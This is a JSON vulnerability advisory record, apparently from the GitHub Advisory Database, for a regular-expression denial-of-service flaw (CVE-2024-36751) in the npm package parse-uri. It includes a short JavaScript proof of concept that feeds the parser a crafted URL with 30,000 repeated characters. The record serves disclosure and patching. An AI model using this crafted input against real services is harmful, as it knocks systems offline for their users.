{"id":"GHSA-6fx8-h7jm-663j","summary":"parse-uri Regular expression Denial of Service (ReDoS)","details":"An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.\n ## PoC\n```js\nasync function exploit() {\n    const parseuri = require(\"parse-uri\");\n    // This input is designed to cause excessive backtracking in the regex\n    const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';\n    const result = await parseuri(craftedInput);\n    }\nawait exploit();\n```","aliases":["CVE-2024-36751"],"modified":"2025-09-03T12:56:48Z","published":"2025-01-16T00:31:22Z","database_specific":{"nvd_published_at":"2025-01-15T22:15:26Z","cwe_ids":["CWE-1333","CWE-185"],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2025-01-17T15:39:05Z"},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-36751"},{"type":"WEB","url":"https://github.com/Kikobeats/parse-uri/issues/14"},{"type":"WEB","url":"https://gist.github.com/6en6ar/78168687da94e8aa2e0357f2456b0233"}],"affected":[{"package":{"name":"parse-uri","ecosystem":"npm","purl":"pkg:npm/parse-uri"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"last_affected":"1.0.9"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-6fx8-h7jm-663j/GHSA-6fx8-h7jm-663j.json"}},{"package":{"name":"parseuri","ecosystem":"npm","purl":"pkg:npm/parseuri"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}],"database_specific":{"last_known_affected_version_range":"\u003c 2.0.0","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-6fx8-h7jm-663j/GHSA-6fx8-h7jm-663j.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"}]}